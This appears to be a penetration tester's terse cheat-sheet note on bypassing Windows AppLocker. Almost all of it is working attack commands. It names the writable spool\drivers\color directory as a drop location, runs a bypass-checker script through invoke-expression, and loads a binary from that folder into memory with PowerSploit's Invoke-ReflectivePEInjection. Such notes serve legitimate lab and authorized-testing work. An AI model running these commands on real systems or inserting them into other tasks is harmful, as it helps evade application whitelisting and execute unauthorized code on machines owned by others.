| update $group, $root_folder
# location: /opt/kashz-scripts/windows/appLocker-Bypass-Checker.ps1
Get-Content .\appLocker-Bypass-Checker.ps1 | out-string | invoke-expression
# most commonly used
C:\windows\System32\spool\drivers\color
Execute using Invoke-ReflectivePEInjection.ps1
NOTE: sometimes, have noticed this breaks the shell, other times it works.
# located at /usr/share/windows-resources/powersploit/CodeExecution/Invoke-ReflectivePEInjection.ps1 .
$ByteArray = [System.IO.File]::ReadAllBytes("C:\windows\System32\spool\drivers\color\FILE");
Invoke-expression(Get-Content .\Invoke-ReflectivePEInjection.ps1 |out-string)
Invoke-ReflectivePEInjection -PEBytes $ByteArray